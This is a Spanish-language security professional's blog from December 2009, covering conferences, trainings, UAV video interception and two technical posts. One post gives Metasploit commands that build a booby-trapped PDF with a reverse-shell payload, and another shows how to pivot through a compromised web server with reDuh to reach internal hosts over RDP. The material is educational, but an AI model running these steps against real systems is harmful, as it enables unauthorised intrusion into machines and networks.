jueves, 31 de diciembre de 2009

No es un balance del 2009

Los balances de fin de año me generan mucha melancolía, así que esto solo es un repaso de algunos buenos momentos del año.

Sin dudas, uno de los momentos en donde se alinearon los planetas para mi, fue a principio de año cuando junto a un grupo excepcional de personas fundamos BASE4 Security S.A. Fue una de esas decisiones arriesgadas en las que te jugas mucho, pero a poco de cumplir nuestro primer año, puedo decir que la empresa es todo un éxito! y una de las mejores decisiones que tome en mi vida.


Junto a BASE4 estuve asustando a los usuarios con mi charla "Explotando el Eslabón Mas Débil" sobre client side attacks. Este tour de concientizacion me llevo por SSHNEA en Corrientes, PampaSeg en La Pampa, ADACSI y el CSIRT de Banelco, entre otros.


También hicimos un recorrido muy grande con el COMBAT training, por el cual habrán pasado unos 70 ninjas durante todo el año, y fue una de las cosas que mas disfrute porque me dio la oportunidad de conocer a gente maravillosa y hacerme de muchos nuevos amigos. Un gran saludo para todos!


El viaje a Las Vegas con todo el staff de la ekoparty (solo falto Giba) también fue increíble, asistimos a la Black Hat y la DEFCON, manejamos por el desierto desde Los Angeles a Las Vegas, y lo mas importante es que fue un viaje con amigos.


La ekoparty fue increíble, lo que siempre rescato es la oportunidad de reunirse con todos los viejos amigos y conocer a muchos amigos nuevos!

Con Bruno, Guillermo y Leonardo Nve

Con el blogger amigo Alejandro Eguía de Spamloco

Con los ninjas Alexander y Jorgito

Con Politos y el viejo viejo Phreaking

Con el lockpicking master Deviant Ollam

Deportivamente fue un año muy bueno también, especialmente los primeros 6 meses, donde hasta llegue 3o. en una carrera de 10km, luego corrí 30km y comencé a entrenar para mi primer maratón (42km)!

Lamentablemente me lesione una semana antes de la maratón y no la pude correr, pero será un nuevo objetivo para el 2010 junto a los Trotadores Urbanos ;-)


Quiero agradecer a todos los amigos, y muy especialmente a mi Gesolmina :) Les deseo a todos un prospero 2010 con mucho trabajo, salud y paz!

lunes, 28 de diciembre de 2009

UAVs en Argentina

Continuando con la temática de mi post anterior sobre UAVs que no cifran los feeds de video, me encontré con que en Argentina esta bastante desarrollada la producción de UAVs.

Gracias al amigo del blog Live4Tech, descubrí que casi todas las fuerzas armadas argentinas desarrollan sus propios UAVs y hasta hay empresas privadas desarrollando y exportando estos sistemas.

El Lipán M3 del Ejercito Argentino posee un alcance de 40km, 5 horas de autonomía, puede alcanzar una velocidad máxima de 170 km/h, transportar 20 kg y alcanzar los 2.000m de altura.


La Armada Argentina, también tiene su propio proyecto llamado "Guardián", y a continuación tienen un video detallando las características de este UAV:



Según algunos medios, la Fuerza Aérea Argentina, tiene ambiciosos proyectos que proponen, para el largo plazo, un UAV de 90 metros de envergadura, propulsado por 14 motores y operados con células de combustible recargadas con energía solar, lo que les permitiría volar a 20000 metros de altura, durante 3 meses, portando una carga útil de 100 kg.

En el ámbito privado, la empresa cordobesa Nostromo Defensa S.A. diseñó los prototipos Yarará, Caburé y Yaguá, que por sus reducidas dimensiones pueden ser transportados en contenedores pequeños o incluso en mochilas.

La exportación de su UAV "Yarará" al Departamento de Defensa de USA en el año 2006 colocó la imagen de la empresa al más alto nivel dentro del mercado internacional de UAV. Se comenta que algunos de sus ingenieros trabajaron en el desarrollo del famoso misil Cóndor I y II de la Fuerza Aérea Argentina.



Según algunos trascendidos, los cuales no puedo confirmar, Gendarmería Nacional, una fuerza de seguridad (no militar) que se encarga de proteger las fronteras, también estaría utilizando modelos radiocontrolados con cámaras incorporadas para hacer seguimientos e inteligencia sobre las zonas costeras, pero a través de particulares que pueden costear el desarrollo de los mismos.

La siguiente seria una imagen obtenida del modelo utilizado por Gendarmería:


En este ultimo caso, y "probablemente" en el resto de los UAVs argentinos, no se estaría cifrando la transmisión de video.

FUENTES:
- KungFooSion: Más Fácil que Capturar Video de Aviones Espía
- Wikipedia: Lipán M3
- Wikipedia: Lista de UAVs existentes
- Nostromo Defensa S.A.
- Nueva Mayoría: Desarrollo de vehículos aéreos no tripulados en la región
- Argentina: Continuan los desarrollos de aeronaves no tripuladas
- UAV "Guardian" de la Armada Argentina

miércoles, 23 de diciembre de 2009

LOD Subcampeón Argentino de Paintball

Mis amigos de LOD quedaron segundos en el campeonato argentino de paintball así que no quería dejar de felicitarlos!! Sos Groso LOD!! ;-)


Y esta es la actitud ekoparty aplicada al paintball, con los logos de la eko en las marcadoras:


Ver también: Tres Minutos de Furia

martes, 22 de diciembre de 2009

Más Fácil que Capturar Video de Aviones Espía

Hace unos días, el WSJ publico que unos insurgentes iraquíes capturaron feeds de video, enviados por aviones espía no tripulados, con un software ruso que solo cuesta 26 USD.

Los Predator "drones", conocidos como UAV "Unmmanned Aerial Vehicle", son aviones no tripulados creados con el objetivo de realizar "survillance, reconnaissance and weapons delivery" :?


El escandalo se genero porque los UAV no cifran los feeds de video, y esto permite que el enemigo conozca cuales son las zonas y objetivos bajo vigilancia.

La respuesta del ejercito, fue que cifrar los feeds seria altamente costoso porque los UAVs utilizan tecnología propietaria (General Atomics Aeronautical Systems), y que el cifrado agregaría un retardo en las comunicaciones que impediría "eliminar al enemigo" con precisión.

Los UAV transmiten las capturas de video desde el aire a una base terrestre, o a través de vínculos satelitales. Al parecer, también usan o han usado satélites privados, los usados para TV, para transmitir el video.

A raíz de esto, es que me llama la atención que recién ahora se haya generado tanto escandalo, y mas aun cuando en Agosto tuvimos a Leonardo Nve en la ekoparty, dando una charla sobre captura de datos, y ataques desde Internet, a enlaces satelitales ;)


Pero como si esto fuera poco, recientemente Raloef Temming dio una presentación en la ZaCon, en donde demostró diferentes "debilidades" que poseen los UAV. Como por ejemplo, correlacionar una imagen del feed con Google Earth, detectar si estamos siendo "pintados" por un laser para que luego el UAV nos arroje un misil, o capturar la señal del laser para luego "pintar" otra víctima. (Vayan al minuto 14:14)



Lo mas triste de todo, es que cada UAV cuesta aproximadamente 10.000.000 USD cada uno, y el premio nobel de la paz, piensa comprar mas de 300 de estos, para continuar con la pacificación de Medio Oriente.


REFERENCIAS:
- SkyGrabber Software
- ZaCon09 - Raloef Temming, Make Tea not War
- Wikipedia: MQ-1 Predator
- Wired: Insurgents Intercept Drone Video in King-Size Security Breach
- General Atomics Aeronautical Systems
- WSJ - Insurgents Hack U.S. Drones

jueves, 17 de diciembre de 2009

Explotando el 0-day de Adobe Reader

El Lunes 14, Adobe alerto a sus usuarios que se estaba explotando activamente una vulnerabilidad para la última versión de Adobe Reader y Acrobat.

El Martes 15, Adobe anunció a todos sus usuarios que van a continuar desprotegidos hasta el 12 de Enero del 2010, cuando salga el parche de seguridad.

El Martes 15, H.D. Moore anunció vía Twitter que ya se encontraba disponible el exploit para el 0-day de Adobe en MetaSploit.

Probé el exploit de MetaSploit en una máquina virtual con Windows XP y la ultima versión de Adobe Reader (9.2) y anduvo muy bien, solamente tuve que aumentarle la memoria a 1GB de RAM, de lo contrario no me funcionaba.

# creo el archivo .pdf en MetaSploit
./msfconsole
use exploit/windows/fileformat/adobe_media_newplayer
set FILENAME feliz_navidad.pdf
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.10.109
exploit

# dejo escuchando por la conexión reversa
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.10.109 E

Solución: deshabilitar JavaScript en Adobe.


FUENTES:
- Security Advisory for Adobe Reader and Acrobat
- CVE-2009-4324
- Bugtraq ID: 37331
- Adobe PSIRT

martes, 15 de diciembre de 2009

Último COMBAT training del 2009!

Ayer Lunes, termino el ultimo COMBAT training del 2009, después de 3 semanas intensivas de trainings y charlas por diferentes lugares.

De izquierda a derecha, Emiliano, Fabio y Jorge (Tierra del Fuego), "/me" y Carlos. Faltan en la foto, Diego G., Diego R. y Ricardo. En esta edición del training me volvieron loco con los faltazos, sin dudas esta época del año es bastante complicada para las empresas.


Ayer también, se realizo el CTF del COMBAT training y el ganador fue Diego García, felicitaciones Diego! En segundo lugar y peleando la punta, quedo Emiliano, y en tercero Ricardo :)


No hay mas trainings por este año, pero pienso dedicar el verano a preparar el COMBAT training 2.0, stay tunned! ;-)

martes, 8 de diciembre de 2009

HTTP Tunneling con reDuh

reDuh nos permite realizar una conexión TCP, a través de tráfico HTTP totalmente válido. Un ejemplo simple, sería tomar control de un servidor Web en la DMZ, y desde allí realizar una conexión RDP a un servidor de la LAN.


El primer paso seria subir el reDuh Server al servidor Web comprometido. reDuh Server consta de un script programado en 3 lenguajes diferentes (".jsp", ".asp" y ".php"), según la tecnología del servidor Web deberíamos elegir cual de ellos subir.

Luego deberíamos ejecutar el reDuh Client que se conectara con el reDuh Server, y abrirá una interfaz de administración en el puerto TCP/1010 de nuestro sistema, a este puerto nos conectamos utilizando telnet.

// como root (ya que abre el puerto 1010), ejecutamos el cliente
# java -jar reDuhClient.jar http://www.victima.com/reDuh.php

// nos conectamos a la interfaz de administración
telnet localhost 1010

Una vez conectados a la interfaz de administración, podemos utilizar 3 comandos: "[usage]", "[createTunnel]" y "[killReDuh]".

Primero vamos a crear un túnel que nos permita realizar una conexión RDP a un servidor de la LAN, obviamente debemos conocer la IP.

// creamos el túnel
>>[createTunnel]1234:10.10.10.10:3389

Luego con nuestro cliente RDP nos conectaremos al puerto local 1234 que nos permitirá realizar la conexión con el servidor de la LAN.


A partir de este momento, deberíamos tener acceso al servidor de la LAN mediante una conexión RDP, que esta pasando a través de un servidor Web en la DMZ. awesome! :)

Para terminar el túnel utilizamos el siguiente comando:

// terminamos el túnel
>>[killReDuh]

Y este es el final, verdaderamente maravilloso...


Referencias:
- Sensepost reDuh
- reDuh Server
- reDuh Client

domingo, 6 de diciembre de 2009

Primera edición de PampaSeg

Este 4 y 5 de Diciembre tuvo lugar la primera edición de PampaSeg, las Jornadas de Software Libre y Seguridad Informática, en Santa Rosa, La Pampa.


Este fue el primer evento de su tipo que se realizo en La Pampa, y tuvo una importante convocatoria de Speakers de todo el país. Sin ninguna duda, PampaSeg será un gran punto de desarrollo para la seguridad informática en toda la región pampeana.

Para comenzar con el pie derecho, el Honorable Consejo Deliberante del Municipio de Santa Rosa declaro a PampaSeg "evento de interés cultural". w0w! :)

Desde BASE4 Security y ekoparty estuvimos apoyando este evento, pero el fundador y principal promotor de PampaSeg es Federico Bustos, asi que todas mis felicitaciones para el. Grande Fede!

Por mi parte, también estuve dando una charla sobre client side attacks, y como pueden ver evangelizando en La Pampa sobre la ekoparty:


Mi amigo personal, Juan Pablo Borgna, otro de los fundadores de ekoparty, también estuvo dando una "peligrosa" charla sobre Wireless Hacking, y sus interesantes experiencias durante los wardrivings que el se encarga de organizar cada año durante la conferencia:


Saludos a todos los talibanes del Software Libre que conocí en La Pampa! Debo confesar que cuando prendía la Mac para mi charla, me cayeron algunas gotas de transpiración... :-?

COMBAT training @ Rosario

Durante toda la semana pasada realizamos el primer COMBAT training en la ciudad de Rosario.


Realmente espero volver pronto, la ciudad de Rosario no tiene comparación, y el grupo de Ninjas que se reunió tampoco ;-) De izquierda a derecha, Alejandro, Martin, (yo), Mauro, Jerónimo y Leandro.


El jueves tuve que partir raudamente hacia La Pampa para PampaSeg, pero Jerónimo continuo con todo su wi-foo y me hizo saber que el ganador del CTF fue Alejandro Sorrentino, felicitaciones Ale!

jueves, 3 de diciembre de 2009

hackers @ Rosario

Toda esta semana estuve dictando el COMBAT training en la ciudad de Rosario, y como no podía ser de otra forma, los amigos Carlos Tori y Ulises Cuñe, me llevaron a conocer la noche rosarina.


Espero que se repita pronto!

LinkWithin